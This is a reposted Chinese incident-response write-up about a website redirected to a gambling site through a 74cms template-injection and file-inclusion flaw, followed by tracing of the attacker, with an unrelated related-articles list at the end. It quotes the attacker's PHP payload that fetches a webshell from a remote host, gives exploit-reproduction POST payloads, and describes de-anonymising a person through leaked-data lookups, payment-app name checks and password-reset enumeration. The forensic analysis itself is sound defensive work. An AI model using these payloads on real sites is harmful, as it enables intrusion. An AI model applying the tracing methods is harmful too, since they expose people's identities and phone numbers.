记一次应急响应到溯源入侵者

文本转载于:https://www.freebuf.com/articles/web/289450.html

1. 前言

今年的某月某日,系统监测到客户的一企业官网www.******.com遭到了网页篡改,经过人工确认将浏览器的UA替换为百度UA后访问网站,此时网站链接自动跳转至赌博类违规网站,当日上午随即受到客户的召唤,立刻赶往客户单位进行初步检查,并将相关日志文件及样本拷回做进一步分析。1632311166_614b177ee7ff1c64655ff.png!small

2. 事件分析

因去到现场时index.php文件已经被网站管理员恢复了,但问题不大,还好这哥们留了个心眼备份了文件index_.php,定位到被篡改的文件为首页面的index_.php,被修改的时间为2021/7/18 18:31:04,可看到攻击者直接替换掉了首页文件的内容。该PHP内容经过判断,来自浏览器各大搜索引擎的UA情况后将其访问跳转至特定的网站,其中$curl=base64_decode("aHR******************W5kZXgucGhwP2hvc3Q9")经过解码后为https://yin*******.com/index.php?host=,该连接可以理解为攻击者的灰色产业流量随机生成跳转页面。1632311188_614b179414f8d79462674.png!small1632311190_614b1796dc122133bc3e2.png!small

继续对其事件服务器排查,发现其被篡改的网站为小皮软件所搭建,中间件为Apache,其数据库与FTP服务账号密码均为弱口令,而且服务器上共部署了9个网站之多。1632311203_614b17a34d6ec21b8e1d0.png!small1632311206_614b17a68f1572ba3ebd6.png!small

3. 攻击分析

使用D盾对其所在的目录进行后门查杀,并查杀出了多个后门文件,其中最早的后门文件存在另一个网站****系统的web目录上被上传的时间为2019/1/11。1632311217_614b17b18bd0094a8b3f4.png!small

发生篡改的系统为服务器上的****系统其目录为r****5,该目录下的后门文件最早的时间为2021/3/17,发生篡改的时间为2021/7/18号,可看到在篡改前2021/7/17是有新的后门文件产生的。1632311232_614b17c0caa5bfe2a8ca0.png!small

可看到最近的2021/7/17 22:41:34时有条log的日志文件产生,且日志内容带有恶意的后门语句。1632311245_614b17cd52a926313486b.png!small

跟进到\data\Runtime\Logs\Home目录下查看21_07_17.log,可见22:41:34时162.***.***.***的IP在/index.php?m=home&a=assign_resume_tpl进行了远程文件包含的操作

<?php fputs(fopen("home.php","w"),"notfound!!!<?php file_put_contents('url.php',file_get_contents(base64_decode('aHR***************GkudHh0')));?>")?>

1632311258_614b17da38b2d19e06304.png!small

将其内容写入home.php文件并在22:41:36生成到了网站的根目录下。1632311265_614b17e1ecbed6291d1f6.png!small

打开home.php文件可见攻击者已成功将其内容写入至文件中。1632311274_614b17eaa10adfff1313f.png!small

其中aHR**********************veGkudHh0经过base64解码得到链接http://******8.top/xi.txt,该内容为php一句话后门语句。1632311291_614b17fb2151d27046487.png!small

在‏‎22:41:39时攻击者并使用home.php文件远程读取一句话后门的TXT文件并生成了url.php的后门文件,其后门内容与远端TXT文件内容一致。1632311302_614b1806012f97b1eac08.png!small

至此,攻击者在2021/7/18号18:30:31时上传了logo.jpg文件其内容就是index.php恶意跳转的代码,并在18:31:04时替换掉了index.php 达到了篡改的目的。1632311312_614b18101e54e296854e9.png!small1632311316_614b181442dbf870013bb.png!small

4. 攻击复现

查看Application目录下的文件,可看到该被入侵篡改网站使用的是74cms所搭建的,其版本为6.0.13。1632311326_614b181e703a69b6fd4e3.png!small

据了解小于6.0.48的版存在模板注入与文件包含漏洞,恰好被篡改的网站74cms的版本在漏洞版本的范围内,攻击者则是利用了该版本的漏洞达到的getshell的目的,下面将含有漏洞的版本下载至本地搭建复原攻击者漏洞利用的过程。1632311335_614b1827611876021f895.png!small

该漏洞位于/Application/Common/Controller/BaseController.class.php文件的assign_resume_tpl函数因为过滤不严格,导致了模板注入,可以进行远程命令执行。

访问http://127.0.0.1/index.php?m=home&a=assign_resume_tpl,使用POST方式提交数据:

variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

1632311359_614b183f098f8dd59eb36.png!small

随后到data\Runtime\Logs\Home目录下产生了错误的log日志文件,并将phpinfo写入到了日志文件中。1632311368_614b184875ce8bff24979.png!small

接下来就是包含日志里记录的phpinfo语句,POST方式提交

variable=1&tpl=data/Runtime/Logs/Home/21_07_23.log

成功利用文件包含漏洞包含出了phpinfo。1632311382_614b18566d675898d6bd6.png!small

5. 溯源攻击者

经以上分析得知,攻击者在17-18号期间利用该漏洞最终生成了url.php的后门文件,提取出access.log中间件日志文件17到18号的流量,再从其中筛选出url.php的流量情况,共得到45.**.***.***(美国)、27.***.***.***(韩国)、61.***.***.***(香港)三个IP,目测这三个IP均为攻击者的代理IP。1632311425_614b188141a5cfe3c29b1.png!small

上述得到的攻击参数中,base64解码得到链接http://******8.top/xi.txt为存放一句话的文本,其网站首页为攻击者的个人页面。*****8.top因使用的是Cloudflare服务商的CND加速无法获取到服务器真实的IP,但在查询历史解析时hacker.******8.top二级域名解析过103.***.***.***(香港),经访问该IP这是目前*****.top域名的真实IP。1632311447_614b189713c6e3c845a0d.png!small

对103.***.***.***这个IP进行端口探测以及目录扫描,其中根目录下的xin.txt、xi.txt、dama.txt、123.txt均为后门文件的文本格式可见该攻击者应该是职业的黑灰产人员了,根目录下的config.json则为猫池挖矿钱包地址:4AW2XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Pass:20211632311468_614b18acf0e6c02892bfa.png!small

进一步的信息收集通过对103.***.***.***历史绑定的域名反查,在2021/07/12时heike****.com解析到过该IP。1632311480_614b18b8983c6097bc23e.png!small

访问heike****.com可看到该网站为黑客性质类论坛,目前域名解析的IP为154.***.***.***,其443端口为黑客性质与黑产SEO相关网站。1632311490_614b18c21939e140489f6.png!small1632311494_614b18c617effca22f044.png!small

回到*****8.top这个攻击者的个人页面网站,在查看网页源码时发现其显示的头像链接https://q2.qlogo.cn/headimg_dl?dst_uin=77*******&spec=640&img_type=jpg,其源码调用的是QQ头像库的链接,得到QQ号77*******与其QQ资料的头像相同。1632311506_614b18d27161adcdea064.png!small

使用大数据检索库得到其QQ绑定的手机号为17*********,归属地为内蒙古锡林郭勒,运营商中国电信。1632311515_614b18dbe354b80f3e66a.png!small

使用支付宝转账功能证实该手机号已实名,并得到某宁名字,且头像为个人自拍帅照一张,资料显示也为内蒙古地区,并且其微信也是绑定该手机号。1632311524_614b18e4b454cbbb21815.png!small1632311528_614b18e82dcd751c13e26.png!small1632311533_614b18ed4690e63237903.png!small

经过以上的溯源我们得到了基本的信息,可以确定该攻击者从事的是黑灰产的SEO,专门通过入侵互联网上脆弱的网站植入后门、暗链、跳转劫持等以达到提高其网站的流量与权重,黑帽SEO的盈利模式通常是以访问量来结算的,所以就得有各大平台的流量统计插件来统计访问量,下面继续收集其信息。

访问http://*****8.top/seo/目录在以下统计图标中得到https://www.cnzz.com/stat/website.php?web_id=128******友盟的统计ID。1632311544_614b18f8736f03faa614a.png!small1632311547_614b18fb93f775b1d4fba.png!small

并在友盟统计登录的忘记密码功能处,输入账号(为前面域名的名)找回密码得到该账号绑定的手机号为159********。1632311557_614b190558b1609cb3bd9.png!small

在http://*****8.top/seo/tz.js的跳转脚本中指向http://*****8.top/seo/cps.html页面。1632311566_614b190e6d17780a32b79.png!small

访问该页面得到另一个友盟的统计ID:https://uweb.umeng.com/v1/login.php?siteid=127x******1632311584_614b19209fc4ea6167f38.png!small1632311588_614b192410dfd60c8abae.png!small

捕获前面篡改跳转到https://yin*****.com违规网站的js文件,得到到百度统计的ID:https://hm.baidu.com/hm.js?fe000000000000000000000000000同时也得到yin*****.html页面该名称对应友盟统计ID:12*******的用户名yin****。1632311605_614b1935b2015452d59f6.png!small

在百度统计的密码找回功能中,经模糊测试同源名称其中用户名为****888、****8888、****88888均存在注册。1632311617_614b1941b4c5edb7e567b.png!small

在源代码尾部得到其51la的SDKid:JNT**********1632311626_614b194aeb442fe61c8ce.png!small

6. 总结

经过以上分析,攻击者在2021/7/17 时通过骑士cms的注入与文件包含漏洞写入了url.php一句话后门文件,并上传logo.jpg文件替换掉了index.php网站首页的内容使得将网站跳转至赌博网站。

修复建议:

该网站被多次篡改并留存其他攻击者的后门文件时间久远,建议对服务器整个磁盘进行webshell后门查杀。

网站所使用的cms框架版本过低存在高危漏洞,关注骑士cms官网发布补丁以及修复方法http://www.74cms.com/news/show-2497.html。

服务器上的数据库与FTP服务均为弱口令,建议增强口令的复杂度,8位字符以上且具有大小写组合。

7. 小Tisp

类似于这类的页面篡改事件,当我们去现场后该如何开展相应的工作呢。

1.到达客户现场后第一时间告知网站管理人员请勿对被篡改文件进行删除或修改,本次事件的网站管理员就马上把重要证据文件给修改恢复了,但不过还好这位小哥备份了下来,建议去现场前电话跟客户电话沟通好能不动的就不动,最好是直接拔网线断网,留好证据方便后面溯源的工作。

2.到现场后跟网站管理人员,发生篡改后有没有自己进行巡检自己发现什么异常之类的,自主发现的话是什么时候发现的呢,确定好被篡改文件的首次修改时间,对下面核对日志溯源的工作至关重要。

3.通过判断确认该篡改为内容篡改还是跳转劫持类型的,询问网站管理员当前web文件存放的位置除了被篡改的网站还有没有其他系统的网站,都开了那些端口之类的。

4.看当前环境下的拓扑图,看是否有记录流量设备的日志,如果有此次篡改的攻击有没有产生什么相应的告警之类的等等。

5.很多单位的等保系统现在也都部署了网页防篡改系统,但也屡屡发生被篡改的事件,以往的经验来看,部署了还发生篡改的要么就是防护的目录不到位,要么就是上防护之前就已经遗留有后门文件了,还有就是程序员在更新代码时把防护关了后就忘了再次开起来了,所以也要有必要的问一下有没有进行一个查杀后门文件的周期工作,还有防护了那些目录或者页面等。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/358499.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

系统测试集成测试单元测试_单元和集成测试的代码覆盖率

系统测试集成测试单元测试我最近在一个宠物项目中着手构建自动化的UI&#xff08;集成&#xff09;测试以及普通的单元测试。 我想将所有这些集成到我的Maven构建中&#xff0c;并提供代码覆盖率报告&#xff0c;以便我可以了解测试覆盖率不足的区域。 我不仅发布了项目的源代码…

教你玩转CSS 媒体类型

目录 CSS 媒体类型 媒体类型 @media 规则 其他媒体类型 CSS 媒体类型 媒体类型允许你指定文件将如何在不同媒体呈现。该文件可以以不同的方式显示在屏幕上,在纸张上,或听觉浏览器等等。 媒体类型 一些 CSS 属性只设计了某些媒体。例如 voice-family 属性是专为听觉用户…

计算机盘符无法重命名,win8磁盘分区无法重命名怎么办

有些用户在使用Win8系统的过程中遇到C盘分区重命名的时候发生“无法修改名称”,那么win8磁盘分区无法重命名怎么办呢?下文学习啦小编就分享了解决win8磁盘分区无法重命名的方法&#xff0c;希望对大家有所帮助。win8磁盘分区无法重命名解决方法1、 按“WinR”输入“regedit”单…

泽泽计算机科技,《计算机与信息技术》大学技能学习丛书.pdf

计算机与信息技术魏巍摇周霖摇主编摇图书在版编目(悦陨孕)数据摇计算机与信息技术辕魏巍&#xff0c;周霖主编郾—北京&#xff1a;国防摇工业出版社&#xff0c;圆园园猿援苑摇(圆员世纪高新科技专业英语阅读系列)摇陨杂月晕苑原员员愿原园猿员员远原曾摇 郾计摇 郾 魏援援援 …

记一次CNVD通用漏洞审计

本文转载于&#xff1a;https://www.freebuf.com/articles/web/290697.html 0x01 前言写这篇文章的缘由其实还挺魔幻的&#xff0c;起因是在一次实战渗透时通过弱口令拿下一个低权限用户成功进入后台&#xff0c;在后台寻找功能点通过抓包分析&#xff0c;定位到目标系统后台存…

教你玩转CSS 属性选择器

目录 具有特定属性的HTML元素样式 属性选择器 属性和值选择器 属性和值的选择器 - 多值 表单样式 CSS 属性 选择器 具有特定属性的HTML元素样式 具有特定属性的HTML元素样式不仅仅是class和id。 注意:IE7和IE8需声明!DOCTYPE才支持属性选择器!IE6和更低的版本不支持属…

本地CDI限定词:@Any和@Default

让我们看一下CDI中的开箱即用的限定词 CDI规范声明了三个限定符– Any&#xff0c; Default&#xff0c; New Any &#xff1a;将其视为无所不在的限定词。 它在那里&#xff0c;即使不是;-) Default &#xff1a;顾名思义&#xff0c;当没有其他限定符是特定的时&#xff…

Oracle 关于事物的描述

事物在Oracle中的4种状态&#xff1a; commit--提交 rollback--全部回滚 savepoint name;--定义一个回滚到这里的点&#xff1a;例如&#xff1a;savepoint a; rollback to [savepoint]name--回滚到指定的点 例如 rollback to a;就回滚到a这个地方 例子&#xff1a; ----------…

简单CSS 总结

目录 CSS 总结 你已经学习了CSS,下一步学习什么呢? CSS 总结 本教程已向你讲解了如何创建样式表来同时控制多重页面的样式和布局。 你已经学会如何使用 CSS 来添加背景、格式化文本、以及格式化边框&#xff0c;并定义元素的填充和边距。 同时&#xff0c;你也学会了如何定…

计算机管理里边如何分盘,如何给电脑分盘【设置门径】

很多小伙伴都遇到过如何给电脑分盘的困惑吧&#xff0c;一些朋友看过网上零散的如何给电脑分盘的处理方法&#xff0c;并没有完完全全明白如何给电脑分盘是如何解决的&#xff0c;今天小编准备了简单的解决办法&#xff0c;只需要按照1&#xff1a;首先我们找到电脑里面的此电脑…

(九十三)蓝牙的基本使用

蓝牙在GameKit框架中实现&#xff0c;可以实现文件传递和游戏通信等&#xff0c;蓝牙的缺点是不能得到文件传输的进度&#xff0c;因此不宜传输大文件。 使用蓝牙的一般步骤如下&#xff1a; ①创建蓝牙设备拾取器&#xff0c;类似于图片拾取器&#xff0c;通过代理方法获取拾取…

电脑常识——host文件修改(屏蔽网站或解开屏蔽)

1. 什么是host文件&#xff1a; Hosts文件主要作用是定义IP地址和主机名的映射关系&#xff0c;是一个映射IP地址和主机名的规定。可以用文本文件打开&#xff01;当用户在浏览器中输入一个需要登录的网址时&#xff0c;系统会首先自动从Hosts文件中寻找对应的IP地址&#xff…

面试提问vue中v-if与v-show的区别以及使用场景

目录 区别 使用场景 总结 区别 1.手段&#xff1a;v-if是通过控制dom节点的存在与否来控制元素的显隐&#xff1b;v-show是通过设置DOM元素的display样式&#xff0c;block为显示&#xff0c;none为隐藏&#xff1b;2.编译过程&#xff1a;v-if切换有一个局部编译/卸载的过程…

清华大学计算机系牛人,高考状元不靠加分靠实力

高考状元不靠加分靠实力来源&#xff1a;京华时报 2010-08-24英才档案 录取院校:清华大学计算机专业 毕业学校&#xff1a;河南省濮阳市油田第一中学 高考分数(理)&#xff1a;678分语文117数学135理综283英语143今年初清华大学举行的有三万余名考生参加的自主招生考试中&#…

Web常见漏洞描述及修复建议

1.SQL注入 漏洞描述 Web程序中对于用户提交的参数未做过滤直接拼接到SQL语句中执行&#xff0c;导致参数中的特殊字符破坏了SQL语句原有逻辑&#xff0c;攻击者可以利用该漏洞执行任意SQL语句&#xff0c;如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。…

glassfish_具有GlassFish和一致性的高性能JPA –第3部分

glassfish在我的四部分系列的第三部分中&#xff0c;我将说明将Coherence与EclipseLink和GlassFish结合使用的第二种策略。 这就是通过EclipseLink使用Coherence作为二级缓存&#xff08;L2&#xff09;的全部内容。 一般的做法 这种方法将Coherence数据网格应用于依赖于数据库…

应广大粉丝的要求,推荐几本前端书籍

这些书籍平时会直接发送在主页的QQ技术群,有兴趣的可以加一下。 不想去培训机构,不想花大笔钱的学习,那就自学吧!接招

初中学习计算机基础,初中生计算机基础学习心得

导语&#xff1a;为了提高自身的计算机管理业务素质&#xff0c;促进信息技术教学工作的顺利开展&#xff0c;我于2017年3月份在中小学继续教育网上选学了《计算机应用基础》的课程学习。以下是小编为您收集整理提供到的范文&#xff0c;欢迎阅读参考&#xff0c;希望对你有所帮…

java的数据结构

本文转自互联网 1、二叉树&#xff1a;非线性数据结构&#xff0c;常被用于实现二叉查找树和二叉堆 二叉树的第i层至多有2的 i -1次方个结点&#xff1b;深度为k的二叉树至多有2^(k) -1个结点&#xff1b;对任何一棵二叉树T。 满二叉树 完全二叉树 平衡二叉树 2、 二叉树的遍历…

AssertJ的SoftAssertions –我们需要它们吗?

编写好的单元测试的规则之一是&#xff0c;它应该出于某种原因而失败&#xff0c;因此&#xff0c;单元测试应该测试一种逻辑概念。 有时很难在每个测试中拥有一个断言。 为了遵循规则&#xff0c;我们可能在一个测试中每个对象具有多个断言。 但是&#xff0c;在单个测试中存…